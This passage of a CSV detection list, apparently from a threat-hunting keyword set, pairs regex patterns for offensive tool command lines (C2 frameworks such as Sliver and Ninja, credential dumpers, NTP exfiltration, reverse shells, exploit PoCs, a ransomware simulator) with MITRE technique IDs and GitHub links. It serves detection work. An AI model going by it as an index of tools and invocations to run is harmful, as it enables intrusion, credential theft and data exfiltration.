*",".{0,1000}\.\/mythic\-cli\s.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","271","40","2024-04-29T01:01:05Z","2022-03-07T20:35:33Z" "*./Ninja.py*",".{0,1000}\.\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*./ntdissector*",".{0,1000}\.\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*./nysm/src/",".{0,1000}\.\/nysm\/src\/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","3","205","36","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z" "*./pachine.py*",".{0,1000}\.\/pachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","268","38","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" "*./Passdetective*",".{0,1000}\.\/Passdetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*./Pcredz *",".{0,1000}\.\/Pcredz\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1872","383","2024-01-07T14:17:46Z","2014-04-07T02:03:33Z" "*./PEzor.sh*",".{0,1000}\.\/PEzor\.sh.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*./Phishing.sh*",".{0,1000}\.\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*./pwndrop *",".{0,1000}\.\/pwndrop\s.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*./PyShell *",".{0,1000}\.\/PyShell\s.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","0","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*./recv -d :50001*",".{0,1000}\.\/recv\s\-d\s\:50001.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*./RedGuard*",".{0,1000}\.\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*./redirector.py *",".{0,1000}\.\/redirector\.py\s.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*./reverse-ssh*",".{0,1000}\.\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*./rpcrt.py*",".{0,1000}\.\/rpcrt\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*./rsockstun*",".{0,1000}\.\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*./rsocx -*",".{0,1000}\.\/rsocx\s\-.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*./rwf.py*",".{0,1000}\.\/rwf\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*./scan4all *",".{0,1000}\.\/scan4all\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*./scan4all*",".{0,1000}\.\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","5253","627","2024-03-13T23:03:35Z","2022-06-20T03:11:08Z" "*./ScareCrow *",".{0,1000}\.\/ScareCrow\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*./ScareCrow -*",".{0,1000}\.\/ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*./ScareCrow*",".{0,1000}\.\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*./send -d *:123 -f *",".{0,1000}\.\/send\s\-d\s.{0,1000}\:123\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*./seth.sh * *",".{0,1000}\.\/seth\.sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*./slip.py *",".{0,1000}\.\/slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*./sliver-client_linux*",".{0,1000}\.\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*./snaffler_downloads*",".{0,1000}\.\/snaffler_downloads.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*./snake",".{0,1000}\.\/snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*./SourcePoint *",".{0,1000}\.\/SourcePoint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*./sshimpanzee*",".{0,1000}\.\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*./sudomy*",".{0,1000}\.\/sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*./t14m4t *",".{0,1000}\.\/t14m4t\s.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","N/A","N/A","4","380","82","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z" "*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./update-beef*",".{0,1000}\.\/update\-beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*./Vegile*",".{0,1000}\.\/Vegile.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","695","162","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" "*./xhydra*",".{0,1000}\.\/xhydra.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*./xrkRce *",".{0,1000}\.\/xrkRce\s.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","0","N/A","N/A","5","474","199","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*./zabbix.py*",".{0,1000}\.\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" "*./zexp check -*",".{0,1000}\.\/zexp\scheck\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/jweny/zabbix-saml-bypass-exp","1","0","N/A","N/A","1","95","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z" "*.\\pipe\\mimikatz*",".{0,1000}\.\\\\pipe\\\\mimikatz.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*.\dumpy.py*",".{0,1000}\.\\dumpy\.py.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*.\stager.ps1*",".{0,1000}\.\\stager\.ps1.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*-._ Parasite Invoke_.-'*",".{0,1000}\-\._\s\s\s\s\s\s\s\s\s\sParasite\sInvoke_\.\-\'.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*.500.jasmin*",".{0,1000}\.500\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*.admin.123456.*",".{0,1000}\.admin\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.adminusers.txt*",".{0,1000}\.adminusers\.txt.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*.api.123456.*",".{0,1000}\.api\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.apps.123456.*",".{0,1000}\.apps\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.arsenal.json*",".{0,1000}\.arsenal\.json.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*.asp --adcs --template Machine -smb2support*",".{0,1000}\.asp\s\-\-adcs\s\-\-template\sMachine\s\-smb2support.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" 